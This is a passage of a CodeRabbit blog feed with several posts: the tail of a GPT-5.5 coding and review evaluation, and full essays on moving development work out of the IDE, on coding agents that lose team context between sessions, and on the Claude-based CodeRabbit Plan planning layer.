from the review standard behind the prompt. In plain terms, the model is being pushed to flag bugs that are real, local to the change, and specific enough that the author could fix them. It is not supposed to guess about hidden intent, complain about broad codebase quality, or flag issues that a compiler, type checker, or linter would already catch. The associated comment guidance follows the same logic: comments should be brief, explicit, and matter-of-fact. If this performance carries into a future rollout, it would be a tangible benefit for CodeRabbit users. Increased selectivity translates to reduced time spent sifting through irrelevant comments, fewer redundant review threads, and a greater likelihood that the feedback you receive highlights the issues most worth addressing. ## **GPT-5.5 coding performance** Separate from review, the model performed well at code generation and implementation work. Its main strength here was control, as it tended to choose scoped changes, preserve existing interfaces when asked, and avoid overbuilding. The examples collected show that pattern clearly. When tasked with extending endpoints, maintaining route contracts, or resolving operational issues, the model consistently favored precise modifications with predictable results: enhanced safety, interface preservation, and minimized unintended consequences. Rather than completely rewriting the code, it prioritized the smallest possible modification to resolve the issue while maintaining the stability of the surrounding system. GPT-5.5's code generation excels when tasks are specific and limited in scope. It is highly effective for focused tasks such as bug fixes, minor API adjustments, refactoring that maintains original behavior, and adding targeted tests. In UI tasks, that same pattern produced polished interaction work and solid library use, though originality remained more limited than execution quality. Our team saw better-than-expected animation handling and unusually detailed interactions, but also a tendency to fall back on familiar styling choices, including a noticeable indigo-violet color bias. ## **GPT-5.5 works best with clear direction** For developers using the model directly, the interaction pattern is fairly clear. The model appears to do best when the task is scoped, the constraints are explicit, and the environment can provide feedback. In practice, that means giving it concrete requirements, preserving interface expectations, and letting it run or inspect the system when possible. The model performed better when it could move through a visible loop of change, inspection, and correction rather than trying to solve everything in one shot. That fits the broader pattern we saw throughout the tests: more direct output, less wasted tokens, and better results on bounded tasks. Our team's testing revealed that the model followed instructions too literally, especially when the prompt was poorly structured, lacked detail, or had weak underlying concepts. In those cases, the model often did not repair the direction on its own. It tended to execute the request as written, even when a more experienced collaborator might have paused, clarified, or challenged the premise. ![A product analysis slide detailing GPT 5.5's strengths and limitations in coding work.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_93f473f42c.png) That means the prompt quality has a bigger effect on the result than developers expect. The model looks strongest when the request is specific about the intended behavior, the constraints, and the success criteria. A vague or internally inconsistent prompt can lead the model to generate a rapid response, but that output is more likely to mirror the prompt's existing weaknesses rather than correct them. ## **Reduced tokens for long-running agents** A noteworthy focus of GPT-5.5 is efficiency. While this is harder to measure with benchmarks than performance in reviews, it emerged as one of the most distinct trends in our testing. The model was often less verbose and surfaced visible progress quickly. This suggests the new version requires fewer tokens for equivalent tasks compared to previous models, a benefit that is difficult to isolate in a single benchmark figure. This is especially relevant for agent harnesses that depend on repeated iterations to converge on the right answer. In systems that follow OpenClaw-like patterns, or any workflow where an agent has to plan, act, inspect, retry, and refine over many cycles, token inefficiency compounds quickly. If the model can stay concise while still being effective, it can reduce the amount of token-heavy overhead in those longer loops. For teams building on external services or agent platforms, that can mean more room for iteration before token usage starts to drag down the workflow. ![Chart illustrates GPT 5.5's superior token efficiency compared to a verbose model, enabling more retries.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_d3066aea8a.png) ## **Should you use GPT-5.5?** GPT-5.5's primary strengths lie in the developer workflow, specifically excelling at: identifying more substantive issues than the previous model, implementing focused changes without broad refactoring, and effectively self-correcting after initial errors. For teams evaluating tools like CodeRabbit, the more defensible claim is better signal per review than baseline, not universally lower review volume. For developers using the model directly, the pattern is just as clear: give it a scoped task, make the constraints explicit, and let it verify its work against the actual system. [Get started with CodeRabbit](https://coderabbit.link/NcmblIe), connect your repo, get your first AI review in minutes. Free to try, no credit card required.

The IDE is no longer the center of software development

David Kravets — Thu, 23 Apr 2026 00:00:00 GMT

For decades, the center of gravity for software development has been the integrated development environment. The IDE was where engineering happened, where code was written, debugged, and refined before making its way into the world. It was the cockpit. Everything else was secondary. ## **The distributed reality of modern software development** But the gap between where engineering work begins and where it gets done has been widening for years. Today, it spans more systems, more teams, and more time zones than any single tool was ever designed to bridge. Consider what a senior engineer actually does during a typical day. Work starts in a Slack thread, a bug report, an architecture discussion, a customer escalation. It moves to a ticket. Then it lands in someone's terminal. By the time a developer starts the real work, they've already lost 20 minutes manually reconstructing context from a PRD nobody can find, a decision buried three threads deep, and a runbook that one person wrote and never shared. ![Flowchart of 'The Engineer's Actual Day' workflow from initial tasks to IDE through tickets.](https://victorious-bubble-f69a016683.media.strapiapp.com/The_distributed_reality_of_modern_software_development_c313bc990f.png) The IDE is present for perhaps one phase of that workflow. The rest unfolds across Git, CI/CD pipelines, monitoring tools, analytics platforms, incident management systems, and whatever messaging tool the team lives in. By the time the IDE opens, most of the real work has already happened somewhere else. **What AI changes about this picture** The emergence of capable AI, particularly AI that can interact with external systems through structured interfaces, introduces a different possibility. Instead of context-switching between a dozen tools to piece together a picture, it is increasingly possible that an engineer can interact with the entire operational ecosystem through a single conversational interface. Ask a question, get context synthesized across systems. Investigate an incident, retrieve correlated signals from monitoring, deployment history, and code in one thread. Prepare a fix, review its impact, and coordinate the response without ever leaving the environment where the investigation began. This is not a new IDE. It is a different interaction model entirely. What is emerging is something closer to an operational interface. It’s one that treats code as one artifact among many in a larger system, rather than the primary object around which everything else is organized. In essence, AI makes code cheaper, and context more expensive. ## **The terminal is not the center of gravity, either** Here is where the current wave of AI coding tools gets it partially right and then stops short. Most coding agents today treat the individual developer's terminal as the center of the universe. The typical sequence looks like this: * A discussion happens in Slack * Context gets mentally assembled by one engineer * They switch to a CLI agent, prompt, generate code * A PR appears The rest of the team has no visibility into what happened, why it happened, or what decisions were made along the way. The work is done. The knowledge is gone. Some tools attempt to address this with durable knowledge files that teams maintain manually. But a file that needs to be kept up to date by the same team that's already losing context is not a solution. It's a different version of the same problem. Crucial team context, the decision made in Tuesday's incident thread and the architectural tradeoff debated last sprint, doesn't end up in a markdown file. It ends up scattered or it ends up lost. Knowledge that lives in one session doesn't scale. It retires, changes teams, or simply gets forgotten, and the organization absorbs the cost quietly, one reconstructed context at a time. The async dispatch model compounds this. You send a task and wait. Something comes back. Maybe it's right. Maybe it's not. Either way, you've lost the ability to steer. The iteration loop is slow, the feedback cycle is broken, and the rest of the team has no idea what's happening until a PR appears. The terminal-centric model fails in two directions. Work stays invisible to the team, and control stays out of reach mid-session. You can't course-correct. You can only wait for whatever comes back. ## **Where the interface should actually live** If the real work of software development happens across Slack threads, tickets, incidents, observability dashboards, and code, then the right interface is not one more tool that engineers have to switch into. It's the environment where they already operate. This is the premise behind the newly released [CodeRabbit Agent for Slack](https://coderabbit.link/cr-agent). CodeRabbit already reviews over two million pull requests per week for more than 15,000 engineering teams. CodeRabbit has built one of the most capable context engines in the industry, one that has learned, at production scale, how to assemble the right context for high-quality code decisions. The Slack Agent takes that same engine and brings it into the place where engineering teams already work. The mental model is a coding CLI, but shared, persistent, and governed. You start a task in a thread. The team sees it happening. Someone course-corrects mid-stream. The work is visible, decisions are recorded, and the knowledge persists at every level—in the thread, in the channel, and in the agent's growing understanding of your codebase, your team, and your systems. **The shift in what "development work" means** ![Mind map asking 'What does development work actually look like?' and listing key tasks.](https://victorious-bubble-f69a016683.media.strapiapp.com/The_shift_in_what_development_work_means_94a06770bc.png) This has meaningful implications for how engineering organizations should think about developer productivity and tooling strategy. When code writing is one action within a larger workflow, rather than the workflow itself, the tools that matter most are not necessarily the ones optimized for editing text. They are the ones that give engineers the clearest, fastest path to understanding system state and acting on it. That changes the calculus around several categories of work: **Investigation and debugging.** A large percentage of senior engineering time is consumed not by writing new code, but by understanding why existing systems behave unexpectedly. An interface that can reason across logs, traces, recent commits, and historical incidents is potentially more valuable here than a better code editor. **Maintenance and operational work.** The long tail of engineering tasks, fixing a configuration drift, responding to a customer-reported bug, updating a dependency with a known vulnerability, involves far more context retrieval than code authorship. An interface oriented around systems rather than files changes how efficiently this work gets done. **Small fixes and targeted changes.** Not every code change requires deep local development. Many require understanding what to change and why, locating the right place, and making a surgical edit. When that investigation and implementation can happen in the same Slack thread where the bug was reported, the workflow compresses significantly. **What this means for engineering leaders** For executives and CTOs, the practical implication is this. Great engineers have always been tool-agnostic—the editor was never the point. What separates high-performing engineering organizations over the next several years will be how well their operational environment is connected, and how much reasoning capability sits on top of that shared layer. The governance question is equally important. Most coding agents push spend and access down to the individual user. That creates chaos at scale, nobody can answer the basics: * Who is using the agent, and on which teams? * How much is being spent, and against which budgets? * What systems can it access? * What knowledge does it see?" If you cannot answer those questions by team, channel, and workspace, you do not have governance. Instead, you have shadow AI infrastructure. The CodeRabbit model ties agent identity to GitHub, scopes tools and memory per channel, and attributes cost at the channel and workspace level. An incident channel can access the observability stack and operational runbooks. An HR channel cannot access engineering logs. This is memory and tooling treated as permissions, not just product features, which is the only model that works for engineering organizations that need to reason about AI agent usage the same way they reason about any other system in production. A few questions worth pressing on as you evaluate your own environment: * How much of your engineers' time is spent context-switching between systems to assemble information that already exists, just in different places? * If an engineer wanted to understand the current state of a system, across code, infrastructure, observability, and recent incidents, how many tools would they need to open? * When a senior engineer leaves, what actually happens to the institutional knowledge they carried? Organizations that treat developer tooling as primarily an IDE question are likely underinvesting in the infrastructure layer that will increasingly determine engineering velocity. ## **A Note for engineers and architects** ![Flowchart illustrating AI for engineers, showing AI models and RCP standards leading to an operational graph.](https://victorious-bubble-f69a016683.media.strapiapp.com/Note_For_Engineers_and_Architects_7dc4ce87f3.png) From a technical perspective, two things came together to make this shift possible. AI models capable of reasoning across heterogeneous context, and the emergence of standardized interfaces, MCP and similar protocols, that allow AI systems to connect to external tools in structured, composable ways. The consequence is that the integration layer, once something each team assembled manually through bespoke scripts and custom tooling, can increasingly be expressed as a connected operational graph that AI can navigate on behalf of the engineer. This does not eliminate the need for engineers to understand their systems deeply. If anything, it raises the bar because the interface amplifies both good judgment and bad assumptions. An engineer who understands the system will use this kind of interface to move faster. An engineer who does not will move faster toward the wrong answer. The technical work worth doing now is investing in the connective tissue such as: clean APIs between systems, structured data in monitoring and observability, and well-organized repositories with meaningful history. The agent interface is only as good as the systems it connects to. ## **The broader thesis** The IDE was the right center of gravity for an era when software development was primarily a local activity, when the code was the system, more or less, and the developer's primary job was to author it. That era is not entirely over. But it is receding. Software systems today are large, distributed, and deeply interconnected. The work of operating them is as much about understanding and responding to a living system as it is about writing new instructions for it. And the team context that makes that work possible such as the decisions, the incident history, and the architectural rationale has always lived in shared communication channels, not in individual terminals. The developer interface that fits that reality should be synchronous, not async. Shared, not individual. Governed, not uncontrolled. And built on context that accumulates over time instead of evaporating after every session. That is not a small change in tooling. It is a shift in what we mean by a development environment. The organizations that recognize this shift early and build the connected operational infrastructure to support it will have a structural advantage in engineering velocity that compounds over time. *Try the new [CodeRabbit Agent for slack](https://coderabbit.link/cr-agent) now\!*

Your AI agent has amnesia

Harjot Gill — Wed, 22 Apr 2026 00:00:00 GMT

\> **Schedule disasters and system bugs arise because the left hand doesn't know what the right hand is doing – Fred Brooks in [*The Mythical Man-Month*](https://en.wikipedia.org/wiki/The_Mythical_Man-Month) describing the [IBM OS/360 Project’s](https://spectrum.ieee.org/building-the-system360-mainframe-nearly-destroyed-ibm) coordination failures that nearly sank it.** ![Text discussing communication issues and their consequences in large programming projects.](https://victorious-bubble-f69a016683.media.strapiapp.com/communication_program_project_2d45d507eb.png) The *Mythical Man-Month* remains one of the most popular books in engineering management and a staple on leaders’ shelves. Fifty years of SDLC evolution has been one long argument against that failure mode. [Agile](https://agilemanifesto.org/) placed developers in the same room as the product. DevOps tore down the wall between dev and ops. [Git](https://git-scm.com/book/en/v2/Getting-Started-A-Short-History-of-Git) and pull requests gave teams a shared record of what changed and why. [CI](https://martinfowler.com/articles/continuousIntegration.html) made the build everyone's problem. Platform teams built paved roads so tribal knowledge wouldn't have to be re-earned by every new hire. Every major shift was a bet on *shared understanding* beating *individual heroics*. Then coding agents arrived, and we regressed. Every engineer now runs a private agent, on their own machine, in sessions nobody else can see. The agent starts each morning knowing nothing. Whatever reasoning was assembled yesterday, whatever alternatives were weighed, context loaded, decisions made in standups, are gone. The process starts to break, creating a false equivalence, “We are shipping faster than ever\!” ![Bar chart showing relative percentage changes in developer metrics with AI's influence.](https://victorious-bubble-f69a016683.media.strapiapp.com/coderabbit_agent_1_43de16be57.png) Brooks was describing human teams drifting apart over weeks. We're now adding AI teammates who drift apart within a single workday, and calling it high productivity. A new hire at least retains what they learned yesterday. ## The context tax Recently, I watched a senior engineer spend 11 minutes setting up context before his coding agent wrote a single line. He described the architecture, and explained why they use Postgres and something else. Finally, he pasted three files, a Linear ticket, and a Slack message of context from his tech lead about a service being deprecated. ![Diagram showing developer workflow from various tools to an agent-generated code output.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_04_21_at_3_21_10_PM_528c233444.png) The agent wrote some code, pretty good code, actually. The senior engineer opined in the end, the next morning, that he would open a new session and probably do the whole thing again for a different context, from scratch. The agent lacks the team level insight. This is AI-assisted development in 2026\. ## The wrong problem Nobody is talking about what the agent knows *before* it starts working. Right framing of a problem makes an average thinker perform like a brilliant one, at least for humans. For AI agents, the gap is more substantial. The same model, given the same prompt, will produce wildly different code depending on whether it understands the system it's working in. Give an agent your codebase with no context and you get plausible-looking code that misses every convention your team spent two years establishing. Give the same agent your codebase plus your architectural decisions, ticket history, on-call runbooks, and the Slack thread where your team decided to deprecate the old auth service, and you get code that looks like a teammate wrote it. Right now, developers are the ones manually assembling that context every single session, acting as interpreters between their own engineering org and a tool that should already know. ## Five kinds of agent amnesia The context problem is the most visible symptom, but the disease is more systemic. There are at least five ways the current generation of agents forget: ### Systems Every session starts cold with no context on systems and choices. The agent opens a file and has no idea why your team chose Postgres over Redis for queues, which auth service is about to be deprecated, or that you decided last quarter to let errors bubble up unwrapped. However, that context exists in a PRD nobody reads, a Slack thread from March, and a senior engineer's head. The first thing a developer does every morning is translate it into a prompt. Again, the dev is reconstructing information that already exists somewhere else in your company, and is adding it into a context window that is limited to a personal session. ### Its own past work The agent you taught yesterday isn't the agent you're using today. You walked it through the billing module: the retry logic that looks wrong but isn't, why you can't trust Stripe's idempotency key on webhooks, and the failed refactor from last summer that's still in the git history as a warning. It produced good code. You closed the tab. What's left is a commit. The reasoning that led to it (the part you'd actually want to keep) went away with the session. Open the same file next week, and you'll do it all again. PS: Yes, you are storing/sharing in [agents.md](http://agents.md) or another durable knowledge base. But is that continuously updated enough to gather crucial team context to make it easily maintainable for the team's day-to-day work? ### Teammates Coding agents are single player. One developer, one session, one machine. The work is invisible to everyone else on the team. If you need to hand off something, your teammate starts from zero because there's nothing to hand off *to*. We spent a decade making development collaborative: Git, pull requests, shared CI, and dashboards that anyone can open. Then we built AI dev tools that made development siloed\! ### What happened next The agent writes a piece of code, makes it to PR, and goes through code review. Next sprint, someone rewrites half of that code and a month later there is a bug in the code that intermittently brings the production level down. Engineers then collaborate on Slack or GitHub to fix the regression. Your agent is out of the loop on all these decisions. Engineers get better by shipping code that gets reviewed, deployed, broken, and fixed. At each stage, there are collective learnings for a team and individual. If you remove the agent from that loop, you are left with an agent that generates plausible code indefinitely, without ever learning which forms of “plausible” actually survive contact with production. ### That somebody is watching Okay\! We are not gonna get past every developer running a local AI coding agent whether it is in CLI, IDE or other new form factors (ADE?\!) . However, the engineering org has no shared view of what and how agents are performing across the team. Which systems are they touching? How are they spending? The economics will force the question soon enough. Uber's CTO told [The Information](https://www.theinformation.com/newsletters/applied-ai/uber-cto-shows-claude-code-can-blow-ai-budgets) this year that his team had already burned through its entire 2026 AI coding budget. Agent amnesia is essentially becoming an economics question. Token spend multiplied by each engineer and compounded daily is a harder problem for engineering teams to solve because they can’t walk away from the productivity gains that got them here in the first place. ## But my terminal coding agent works fine For you. Individually. On your machine. Yes. I'm not arguing that terminal agents don't work. They clearly do. Claude Code, Codex, they're great tools. And, we're not trying to replace them. In fact, features like steering control, sub-agent framework, hooks, and plugins are all immensely useful for a developer, helping them produce more code than ever\! To be clear, these tools do have memory. Claude Code reads a project-level CLAUDE.md, a user-level one, and persists notes in a local memory directory that survive across sessions. It's the durable team knowledge that is lost in local agentic coding sessions. The senior engineer's hard-won understanding of the billing module lives in her markdown files, on her laptop. When a colleague across the geo opens their first session, none of it carries across or persists. ## What agents need to become Edsger W. Dijkstra [wrote](https://www.cs.utexas.edu/~EWD/transcriptions/EWD03xx/EWD340.html) that the competent programmer is fully aware of the strictly limited size of his own skull. Agents don't have skulls. They don't have to forget. We made them forget because we modeled them on ephemeral terminal sessions instead of durable environments where teams actually work. Here's what the next generation looks like, once we stop treating amnesia as a given: **Knowledge should compound.** Instead of a context file lingering on one developer’s machine, every code review, resolved ticket, and architectural discussion should feed a layer that makes the agent more useful next month than it is today. This is a shared knowledge layer, scoped by team, project and domain. When a new engineer joins, the agent already carries the institutional memory that probably lived in a few senior engineers' heads. **Work should persist and be resumable.** Start a task in a Slack thread. Get interrupted. Hand it to a teammate. Come back two days later, and the work is still there. It’s visible, commentable, and resumable by anyone with the right access. It’s not trapped in a browser tab on one developer’s laptop. **The agent should be governed like any other system with production access.** Most coding agents today are priced per seat and scoped per user. Your spend is whatever your developers happen to burn. Your access controls are whatever the tool defaults to, which is usually "everything." Your visibility into what the agent is actually doing across your org is approximately zero. You wouldn't give every engineer root access to prod. There's no reason to give an AI agent flat access to your entire org's context, either. **Context should be auto-assembled from everywhere, not pasted in by hand.** The agent should pull from your codebase, tickets, docs, observability stack, cloud infrastructure, and the knowledge your team has built up over time. The developer's job is to direct the agent, not to be its research assistant. The No. 1 complaint about coding agents is that they generate throwaway code. Too much rework and too many iterations before something is actually mergeable. Better context on the first pass, however, means better code on the first pass. ## **Where this goes** Today, we are introducing [CodeRabbit Agent for Slack](https://coderabbit.link/agent). We're starting with the core loop: planning, code generation, review, investigation, and knowledge-augmented development.One agent for your entire Software Development Lifecycle. It’s all inside Slack, synchronous, and having guardrails in place. But the vision is bigger than a coding agent in Slack. What we're building toward is an agentic layer across the entire SDLC, a layer that understands systems, connects tools, retains the team's knowledge, and executes engineering workflows end-to-end. * Post-deploy regression triage that correlates a Datadog spike to a specific commit and drafts the fix, without anyone having to manually assemble the context. * Breaking change detection that traces downstream consumers across repos before you merge. * Customer bug investigation that starts from a support ticket, checks your error logs, finds the root cause, and posts a preliminary analysis to the team. * Sprint digests that pull from Linear, GitHub, Datadog, and PostHog. We believe the agent is only as useful as the context it can reach and the actions it can take. *The endgame is the layer that connects the stack and makes it programmable from the place where your team already works.* ## **The bet** Individual productivity is up across every engineering team adopting AI. Team-level productivity is still stuck, and it's stuck for three reasons that have nothing to do with model quality: there's no explainable record of what the agent actually did, no cost attribution that matches how teams are organized, and the agent doesn't live where engineering actually happens. Solve those, and team productivity starts to compound the way individual productivity already has. The agents that win won't be the ones with the best model. They'll be the ones that already know your systems when you open them — the conventions, the deprecations, the decisions that didn't make it into a doc. That's durable team knowledge, and it's what's missing from every tool shipping today. I'm not going to tell you this replaces developers. If you've shipped production code, you know that the hard part of engineering isn't typing. It's judgment. It's understanding the system. It's knowing what to build and what not to build. At CodeRabbit, this is the bet we've been making for years. Our independent purpose-built context engine, running two million code reviews a week — is how we've encoded what good engineering teams actually do. CodeRabbit Agent extends that engine into Slack with your team's own decisions and patterns on top. Work happens in the open, where teammates can see it, jump in, and pick up where someone left off. Context compounds, rather than dying at the end of a session. ***Whoever solves agent amnesia wins. Whoever keeps building faster with amnesiac agents is building a faster version of the wrong thing.*** Sources: Figure 1: Sources: Becker, J., Rush, N., Barnes, E., & Rein, D. *Measuring the Impact of Early-2025 AI on Experienced Open-Source Developer Productivity*. METR, July 10, 2025; Xu, F., Medappa, P. K., Tunc, M. M., Vroegindeweij, M., & Fransoo, J. C. *AI-assisted Programming May Decrease the Productivity of Experienced Developers by Increasing Maintenance Burden*. arXiv:2510.10165, 2025\.

Measure twice, cut once: How CodeRabbit built a planning layer on Claude

David Kravets — Tue, 21 Apr 2026 00:00:00 GMT

David Loker was building something for himself. A side project, a secure infrastructure system wrapped around a memory engine, with a chat interface layered on top so he could test it. Nothing earth-shattering. Just a developer doing what developers do on weekends. He had a clear vision. Everything to be locked behind a login. Users authenticated. Sessions tied to accounts. The whole thing to be secure from the start. So Loker, the VP of AI at CodeRabbit, fired up Claude Code and let it run. He described what he wanted. He iterated. He watched the tokens flow. For hours, the system churned, building, compiling and progressing. When it finally came back and told him it was done, Loker leaned in to try it out. He asked how to log in. The system told him to use his user token. He asked where to get the token. There was no answer. Because there was no login page. There was no way to create a user. There was no authentication flow of any kind. The application had been built, thoroughly, diligently and correctly around the concept of a user without ever being given the instructions to actually create one. "That was just something I missed," Loker said, recounting the story during a recent webinar with Anthropic. "I missed the fact that that is something I needed to specify. I wasn't clear." Hours of compute. A functionally sophisticated application. Completely unusable without further work. ## A tax nobody talks about CodeRabbit sits inside the pull request workflow of engineering teams around the world. From that vantage point of processing tens of millions of code reviews, CodeRabbit sees AI-assisted development from the inside out. But volume and velocity are only part of the story. The other part is harder to talk about. Yes, AI coding tools make developers faster. Pull requests per developer are up 20%. Features ship quicker. Backlogs shrink. The productivity gains are real. But so are the costs on the other side of the ledger. Incidents are up 23.5%. AI-generated code produces 1.7x more issues than human-written code. Readability problems have spiked 3x. Loker calls it AI's hidden quality tax. And his argument, laid out in a [webinar](https://www.anthropic.com/webinars/how-coderabbit-orchestrates-agents-to-strengthen-ai-generated-code) alongside Anthropic Applied AI Engineer Ethan Dixon and moderated by Anthropic Account Executive Brittney Tong, is that most people are misdiagnosing the cause. "I'm trying to say that this is not necessarily just a model issue," Loker told the audience. "This is actually a product of how we leverage the tools." The model isn't broken. The workflow is. ## The assumption nobody knew they were making During the webinar, there was a live poll asking the audience where AI projects go wrong. The results weren't close. The overwhelming answer, important requirements were assumed, not stated. It's a deceptively simple problem. When a developer sits down to describe a feature to an AI coding agent, they carry with them years of context about their codebase, their team's conventions, and their company's infrastructure. Things that feel so obvious they barely register as assumptions. But an AI has none of that background. Neither does a new hire. An AI often will just fill in the gaps and keep building. "We have things in our head that we didn't know at some point and we had to be taught. And then we kind of have these things and we assume everybody knows them. And we make that assumption of the AI system as well,” Loker said, reacting to the poll results. The login page wasn't missing because the AI failed. It was missing because Loker, like practically every developer who has ever used AI coding tools, was working from a mental model that felt complete, and wasn't. ## When passing tests isn't enough What makes this failure mode so insidious is that it can be nearly invisible until late in the process. The code compiles. The tests pass. The build moves forward. By every traditional metric, things are going fine. And then you go to log in and there's nothing there. "We can have passing tests, but passing tests doesn't mean we solved the underlying problem," Loker said. "Sometimes the issue is not in the code compilation." This isn't a new kind of failure exactly. Developers have always built the wrong thing sometimes. Misalignment between intent and output is as old as software itself. What's changed is the speed at which it compounds. Before AI coding tools, building a feature took long enough that problems tended to surface naturally along the way. You'd pause to think through the next step. You'd explain what you were doing to a colleague. The work itself created moments of reflection. AI removes most of that friction, which is the point, and largely a good thing. But it also means you can now travel very far in the wrong direction before anything stops you. The feedback loop that used to take days now needs to be deliberately designed back in, because it no longer happens on its own. "Syntax generation is a fairly fast endeavor," Loker observed, "but if you go too far down a path and you find that gap too late, it can be costly to go back." ## A lesson from his father Growing up in Canada, Loker spent a lot of time building things around the house with his father. Fences. Decks. A finished basement. His father had a saying he repeated constantly, the kind of saying that drives children crazy precisely because it's right, “measure twice, cut once.” "You cut that piece of wood, that's it," Loker explained. "It's either the right length or you gotta go back and use something else and start again. That used to infuriate me as a kid, this idea of always slowing things down. But ultimately it leads to a faster overall process once you’re doing those things more carefully and making sure you’re doing the right thing." The other saying, equally maddening to a kid in a hurry, “less haste, more speed.” "I do now see," Loker said, "that we can go really fast with Claude Code. And at the end of the day, it's better to understand that we're building the wrong thing earlier than to go through many hours of iterations and then come out at the end and realize we didn't really build the thing that we wanted to build." These are ancient engineering principles. They predate software by centuries. But AI has changed the economics in a way that makes them newly urgent. When an agent can generate thousands of lines of code in minutes, the cost of going in the wrong direction has never been higher. ## The problem with the way devs work The dominant pattern for using AI coding tools today is what Loker calls the prompt-only workflow. A developer types a description into the prompt, the agent executes, code comes out. It's fast. It's intuitive. It's also where assumptions go to hide. "A lot of times that's where I miss my assumptions," Loker said, "because I'm not actively engaging and thinking through and reviewing that process. I'm kind of doing it stream of consciousness." The individual problem is costly enough. At the team level, it becomes structural. When one developer on a team prompts an agent in isolation, their assumptions, their context, and their interpretation of the requirements is not visible to anyone else. Teammates can't catch what they can't see. Senior engineers can't flag the architectural decision that doesn't account for the company's existing Redis setup. Product managers can't spot the feature scope that drifted from the original spec. The assumptions are scattered, silent, and compounding. ## Planning as an engineering discipline Dixon offered a technical lens on why planning matters that goes beyond process. At Anthropic, they think deeply about what they call context engineering, the practice of managing what information goes into an AI model's attention window, and when. Context, Dixon explained, is a finite resource. Every token added to a prompt competes with every other token for the model's attention. Load too much, load the wrong things, or load them at the wrong time, and the model's coherence over long tasks degrades. Dixon noted that while Opus 4.6 has made meaningful strides in long-context coherence like climbing leaderboards on tests like needle-in-a-haystack, he added that *"*context engineering is not a solved problem." Planning, he argued, is how you get ahead of that problem rather than chasing it mid-execution. "What's really neat about treating planning as this sort of proactive means of context engineering," Dixon said, "is you get all of this front work preloaded. You do all the exploration, you do the discovery work, you come up with a really coherent plan and that makes the behavior of the agent in the long run much more effective." Without that upfront investment, agents spend expensive compute re-reading files, backtracking when they hit unexpected bugs, and re-establishing context they should have had from the start. Planning, in this framing, isn't just good project management. It's good systems architecture. ## The missing layer above the agent CodeRabbit's answer to all of this, [CodeRabbit Plan](https://coderabbit.link/planlayer), an orchestration layer that sits above the coding agent, directing it rather than being replaced by it. The distinction matters to Loker. "This planning system is not meant to take out the Claude Code planning system," he said. "It's meant as a higher level orchestration of that to point it in a really narrow and right direction again and to be collaborative, so that everything that needs to be explicit is made explicit." The workflow begins in the issue tracker. When a ticket arrives from Jira, Linear, GitHub Issues, or GitLab, the planner gets to work. With Claude Opus as the main brain orchestration loop, it explores the codebase, pulls in relevant context from past pull requests, surfaces implicit assumptions, and generates a structured coding plan broken into reviewable phases. Crucially, that plan is a team artifact. It’s visible, editable, and versioned before any code is written. "The plan itself…is a quality gate," Loker said. "If we can make that really good... the downstream effect is very pronounced. You end up with a lot better code at the end of it." ## Three models, one planner CodeRabbit Plan doesn't run on a single AI model. It runs on three, Claude Opus, Sonnet, and Haiku. Each model is matched, in Loker's words, to the complexity of the task at hand. Opus sits at the center. Loker described it as "the main brain and the orchestration loop," responsible for the highest-level reasoning in the system. "It's making the higher level, very strategic decisions," he said, "doing some understanding of what do I need to understand, what don't I know about the problem, and how can I sort of set a strategy up in order to discover that information systematically." Sonnet operates at what Loker described as "a slightly lower level with maybe slightly more targeted tasks" like structured work that is well-defined but still substantive. Haiku handles the most granular layer, the lower-complexity tasks and context distillation. Loker gave a concrete example of what that looks like in practice: "Here's a big file. I need this function out of it. I need to understand what it does, but I don't really need the code." By using Haiku for that kind of extraction, the system avoids burning expensive Opus or Sonnet tokens on work that doesn't require them. "The token cost is cheaper with Haiku, it's faster," Loker said. "And so doing that, and that's going to happen a lot, you're saving a lot of cost and time." Dixon's framing for the Haiku tier: "I treat it as Sonnet-light for most use cases." He added that where Haiku starts to show strain is under pressure. “Once you've traversed many files or you are halfway through a very complex plan, that is where I think you start to see the degradation of a Haiku-class model versus Sonnet," he said. The goal of the entire tiering, Loker said, is straightforward: "Just use the brain of the operation in the spot where it's needed and not everywhere." ## Getting the eval right Building the planner required building something CodeRabbit didn't have: an evaluation system for planning quality, not just code quality. And that, Loker acknowledged, was harder than expected. "Initially it's hand-tuned,” Loker said. “We have to do a lot of manual inspection. We have to slowly build up a good set of LLM judges that can evaluate certain aspects of the plan." One surprise: finding the right level of detail in the plan itself. Too detailed, and the plan becomes stale the moment the code starts evolving. "Finding that tipping point was difficult. It required a lot of iterations." There was another insight that came later. It was measuring the tokens consumed during the exploration phase, and using that as a signal for whether the planning step was actually producing downstream efficiency. Because the system ultimately outputs code, you can evaluate the code and compare it to what comes out when you skip the planning step entirely. Dixon noted that this kind of evaluation discipline generalizes: "Teams building products on top of this type of technology can actually benefit a lot by thinking about what is the sort of right level of granularity for their domain." ## The record of work There's a benefit to collaborative planning that goes beyond the immediate output, and Loker spent time on it during the webinar. When a team works through a plan together, surfacing assumptions, debating scope, and aligning on success criteria, they create a record of what was decided and why. "If somebody new comes in and they want to understand how did we build this, why did we build it,” Loker said, “there's now a record of that. It's not ephemeral." That record serves as a validation tool too. When the code comes back, the team can check it against the original plan and not just against test results, but against intent. Did this do what we said we were going to do? Did it meet the success criteria we agreed on? ## The oldest idea made urgent again Dixon summed up a new reality, a new stage of sorts, of AI coding. "Plan quality is this new sort of distinct moment within generally LLM-driven knowledge work." It's not a new idea. Engineers have always known that understanding what you're building, really understanding it, not just gesturing at it, is the difference between a project that ships and one that gets reworked three times before anyone admits it's wrong. What's new is the economics. AI has compressed the time between intention and execution so dramatically that the cost of misalignment has gone asymmetric. You can now build in hours what used to take weeks. Which means you can now be wrong, at scale, faster than ever before. The login page story is funny in retrospect. Hours of tokens, a sophisticated application, no way to log in. But it's also a parable for an industry that is still learning that the bottleneck has moved. Writing code used to be the bottleneck. AI moved it. The bottleneck now is knowing what to write, and making sure everyone agrees before the first line is generated. Loker's father had it right all along. Measure twice, cut once. Less haste, more speed. It just took an AI coding agent and a missing login page to make the lesson stick. *CodeRabbit Plan is available now. [Try it here.](https://coderabbit.link/planlayer)*

What Claude Opus 4.7 means for AI code review

Juan Pablo Flores — Thu, 16 Apr 2026 00:00:00 GMT

